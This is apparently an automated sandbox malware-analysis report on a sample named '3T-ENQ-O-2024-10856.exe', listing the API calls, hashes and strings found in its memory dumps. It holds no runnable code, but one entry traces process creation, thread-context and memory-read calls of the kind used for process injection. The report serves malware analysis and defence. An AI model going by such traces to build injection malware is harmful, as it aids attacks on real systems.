                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Temp$FileNamePath
                                • String ID: aut
                                • API String ID: 3285503233-3010740371
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                • SHGetMalloc.SHELL32(00C63C31), ref: 00C63A7D
                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00C63AD2
                                • SHGetDesktopFolder.SHELL32(?), ref: 00C63A8F
                                  • Part of subcall function 00C63B1E: _wcsncpy.LIBCMT ref: 00C63B32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                • String ID:
                                • API String ID: 3981382179-0
                                APIs
                                • _memset.LIBCMT ref: 00C635BE
                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C63667
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: IconNotifyShell__memset
                                • String ID:
                                • API String ID: 928536360-0
                                APIs
                                • __FF_MSGBANNER.LIBCMT ref: 00C84603
                                  • Part of subcall function 00C88E52: __NMSG_WRITE.LIBCMT ref: 00C88E79
                                  • Part of subcall function 00C88E52: __NMSG_WRITE.LIBCMT ref: 00C88E83
                                • __NMSG_WRITE.LIBCMT ref: 00C8460A
                                  • Part of subcall function 00C88EB2: GetModuleFileNameW.KERNEL32(00000000,00D20312,00000104,?,00000001,00C80127), ref: 00C88F44
                                  • Part of subcall function 00C88EB2: ___crtMessageBoxW.LIBCMT ref: 00C88FF2
                                  • Part of subcall function 00C81D65: ___crtCorExitProcess.LIBCMT ref: 00C81D6B
                                  • Part of subcall function 00C81D65: ExitProcess.KERNEL32 ref: 00C81D74
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                • RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,?,?,?,?,00C80127,?,00C6125D,00000058,?,?), ref: 00C8462F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                • String ID:
                                • API String ID: 1372826849-0
                                APIs
                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CACC71,?,?,?,?,?,00000004), ref: 00CACFE1
                                • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00CACC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CACFF7
                                • CloseHandle.KERNEL32(00000000,?,00CACC71,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CACFFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: File$CloseCreateHandleTime
                                • String ID:
                                • API String ID: 3397143404-0
                                APIs
                                • _free.LIBCMT ref: 00CAC45E
                                  • Part of subcall function 00C828CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00C88715,00000000,00C888A3,00C84673,?), ref: 00C828DE
                                  • Part of subcall function 00C828CA: GetLastError.KERNEL32(00000000,?,00C88715,00000000,00C888A3,00C84673,?), ref: 00C828F0
                                • _free.LIBCMT ref: 00CAC46F
                                • _free.LIBCMT ref: 00CAC481
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID: CALL
                                • API String ID: 0-4196123274
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: EA06
                                • API String ID: 4104443479-3962188686
                                • Opcode ID: 98d58cfdc9370bfb5271e0468e20e618eadfed051f973e2548648fbb7387fc82
                                • Instruction ID: 70df505c1e0dd8c2973f6c81c047b65cb9c9944c88d0c8704759cb58f8736bda
                                • Opcode Fuzzy Hash: 98d58cfdc9370bfb5271e0468e20e618eadfed051f973e2548648fbb7387fc82
                                • Instruction Fuzzy Hash: B5418F61A041649BDF399B648CD17BF7FA69F56300F284465EA82DB283CA318EC497A1
                                Strings
                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00CD34AA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                • API String ID: 1029625771-2684727018
                                • Opcode ID: 605713e623fce49af9f3b196040b584e5df05debf1fb529d1e79cb48c3d6ddec
                                • Instruction ID: 041487970ae1e0b0d30087f202f816ff891fec18a040d6bff254e7702362e459
                                • Opcode Fuzzy Hash: 605713e623fce49af9f3b196040b584e5df05debf1fb529d1e79cb48c3d6ddec
                                • Instruction Fuzzy Hash: 89F06871D0024DAE9F11EFB0D8D18FFFB78AE10314F10C526E92692181EB359B09DB21
                                APIs
                                • _memmove.LIBCMT ref: 00C8367B
                                • __flush.LIBCMT ref: 00C8369B
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __flush__getptd_noexit_memmove
                                • String ID:
                                • API String ID: 3662107617-0
                                • Opcode ID: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                                • Instruction ID: 399cd4bf05801ef00c2eb07da091e8c8b034df6ddf13183abf3e32edb6036cb2
                                • Opcode Fuzzy Hash: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                                • Instruction Fuzzy Hash: 7241D8B1700686AFDF18AE6DC88056E77A5BF40B58B24953DF815C7340EB70DF418B58
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                                • Instruction ID: 04f87c09789cf399df2a1a0e52a5de7162ef71448fcd2a0d5311848dfc400887
                                • Opcode Fuzzy Hash: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                                • Instruction Fuzzy Hash: CC3184B1600506AFD724DF29C8D1E69F3A8FF883207558229E529CB291DF30EE65DB90
                                APIs
                                • IsThemeActive.UXTHEME ref: 00C636E6
                                  • Part of subcall function 00C82025: __lock.LIBCMT ref: 00C8202B
                                  • Part of subcall function 00C632DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C632F6
                                  • Part of subcall function 00C632DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C6330B
                                  • Part of subcall function 00C6374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00C6376D
                                  • Part of subcall function 00C6374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00C6377F
                                  • Part of subcall function 00C6374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00000104,?,00D21120,C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00D21124,?,?), ref: 00C637EE
                                  • Part of subcall function 00C6374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00C63860
                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C63726
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                • String ID:
                                • API String ID: 924797094-0
                                • Opcode ID: 25642d1d3ea1fa16e539281d71884b0d830cdfa1710dae135576ef538a46825b
                                • Instruction ID: 7dc2935eb9ab5c6bb985bd348ba6a4211a2d48319bd385ce5aad54511a044c98
                                • Opcode Fuzzy Hash: 25642d1d3ea1fa16e539281d71884b0d830cdfa1710dae135576ef538a46825b
                                • Instruction Fuzzy Hash: F4118E719083459BC320EF25DD4591ABBE8FFA4750F00851EF495C73B1DB709A46CBA6
                                APIs
                                • ___lock_fhandle.LIBCMT ref: 00C8F7D9
                                • __close_nolock.LIBCMT ref: 00C8F7F2
                                  • Part of subcall function 00C8886A: __getptd_noexit.LIBCMT ref: 00C8886A
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                • String ID:
                                • API String ID: 1046115767-0
                                • Opcode ID: 7922d8522c8253216c6a928a4d5252d620a5f85fd0ee5b30ea197757ac6ff09b
                                • Instruction ID: 0f2c64cea1a800c818daa43857495433f5a0cfa5cb4da58bd9e913c62b1d305e
                                • Opcode Fuzzy Hash: 7922d8522c8253216c6a928a4d5252d620a5f85fd0ee5b30ea197757ac6ff09b
                                • Instruction Fuzzy Hash: E71102328056108FD711BF6498423597B505F5233CFA50368E4709F2E3DBB49D42E7AD
                                APIs
                                  • Part of subcall function 00C845EC: __FF_MSGBANNER.LIBCMT ref: 00C84603
                                  • Part of subcall function 00C845EC: __NMSG_WRITE.LIBCMT ref: 00C8460A
                                  • Part of subcall function 00C845EC: RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,?,?,?,?,00C80127,?,00C6125D,00000058,?,?), ref: 00C8462F
                                • std::exception::exception.LIBCMT ref: 00C8013E
                                • __CxxThrowException@8.LIBCMT ref: 00C80153
                                  • Part of subcall function 00C87495: RaiseException.KERNEL32(?,?,00C6125D,00D16598,?,?,?,00C80158,00C6125D,00D16598,?,00000001), ref: 00C874E6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                • String ID:
                                • API String ID: 3902256705-0
                                • Opcode ID: c7457a9b1b8239cc21e1a9dd592683378d1704d506db8e6feadb5fcc38c4249d
                                • Instruction ID: 7cb7695118b3ec156d16d943d25b9c05b7573eae6a60df75153c9839c5a25b4d
                                • Opcode Fuzzy Hash: c7457a9b1b8239cc21e1a9dd592683378d1704d506db8e6feadb5fcc38c4249d
                                • Instruction Fuzzy Hash: 33F0287510820EA6CB15FBA8EC069DE77EC9F05368F200025F90592092DBB0C784B7AD
                                APIs
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                • __lock_file.LIBCMT ref: 00C842B9
                                  • Part of subcall function 00C85A9F: __lock.LIBCMT ref: 00C85AC2
                                • __fclose_nolock.LIBCMT ref: 00C842C4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                • String ID:
                                • API String ID: 2800547568-0
                                • Opcode ID: 6f40f87c2eba8564e9ac8b787874eb6e55565b693b655f5666a1d19a2046f2cf
                                • Instruction ID: 8cf86e761f04be003e5af62d226872c2d0bed510ed5442d446611a1085c5328f
                                • Opcode Fuzzy Hash: 6f40f87c2eba8564e9ac8b787874eb6e55565b693b655f5666a1d19a2046f2cf
                                • Instruction Fuzzy Hash: BAF0B4318097069AD715BB7588027AE77D06F4033CF228319B8349B1C2DB7CDA01BB5D
                                APIs
                                • CreateProcessW.KERNEL32(?,00000000), ref: 03391A5B
                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03391AF1
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 03391B13
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                • String ID:
                                • API String ID: 2438371351-0
                                • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                • Instruction ID: c3cee0b08bcf4e65ee0bf8532071ac17b3df4cdc72d724123699ed91da49b262
                                • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                • Instruction Fuzzy Hash: 8512BF24E14658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ClearVariant
                                • String ID:
                                • API String ID: 1473721057-0
                                • Opcode ID: 89e22c7cc1fd2169c41e2eaba3c24a1b786146ba4c6e805469960d0dc1cb3d5f
                                • Instruction ID: 079697641121dbe2ba66ca9315abc3a7a9e2e53ec817a36c92d2b0c6fd019236
                                • Opcode Fuzzy Hash: 89e22c7cc1fd2169c41e2eaba3c24a1b786146ba4c6e805469960d0dc1cb3d5f
                                • Instruction Fuzzy Hash: 65415E70504651CFDB24CF18C484B1ABBE1BF45318F29859CEAAA5B362C371EC85DF52
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: 88ff7b157f03094d068b862d771b67b6020c88fadba00d09022a3216b8d58597
                                • Instruction ID: db7ce3c5edec75f3f28479f3ca676000bc6edcc88b270590ab6fc2736ea6b142
                                • Opcode Fuzzy Hash: 88ff7b157f03094d068b862d771b67b6020c88fadba00d09022a3216b8d58597
                                • Instruction Fuzzy Hash: 9A210871600609FBDB245F21EC81769BBB4FB64350F21C42EE586C5294EF30D5D2D714
                                APIs
                                  • Part of subcall function 00C63F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00C63F90
                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C634E2,?,00000001), ref: 00C63FCD
                                  • Part of subcall function 00C63E78: FreeLibrary.KERNEL32(00000000), ref: 00C63EAB
                                  • Part of subcall function 00C64010: _memmove.LIBCMT ref: 00C6405A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Library$Free$Load_memmove
                                • String ID:
                                • API String ID: 3640140200-0
                                • Opcode ID: 3433850d31e3204d81ed2053658a3ded7bb5bb04249ee39ca147093f25d3d1f6
                                • Instruction ID: 3684cc09aaeec4b8271bbb9951d7f2f1399a39c20f6149286b02027e15c58afc
                                • Opcode Fuzzy Hash: 3433850d31e3204d81ed2053658a3ded7bb5bb04249ee39ca147093f25d3d1f6
                                • Instruction Fuzzy Hash: D611E032600219AACB24BF64DC86B9E77A99F50B00F108829F642EB1C1DF759F05BB60
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ClearVariant
                                • String ID:
                                • API String ID: 1473721057-0
                                • Opcode ID: 7e1854a50e640c46b00e63039bb81e462a4c69ed75394f284bfaa80ccdcdaffa
                                • Instruction ID: fe95fe5794c057466e8bb8be7b37c42621298eb2abcd0aecd3ee339223226454
                                • Opcode Fuzzy Hash: 7e1854a50e640c46b00e63039bb81e462a4c69ed75394f284bfaa80ccdcdaffa
                                • Instruction Fuzzy Hash: 06212770508641CFDB24DF29C444B1ABBE1BF89314F25896CEAAA5B262C331E845DF52
                                APIs
                                • ___lock_fhandle.LIBCMT ref: 00C8BD73
                                  • Part of subcall function 00C8886A: __getptd_noexit.LIBCMT ref: 00C8886A
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
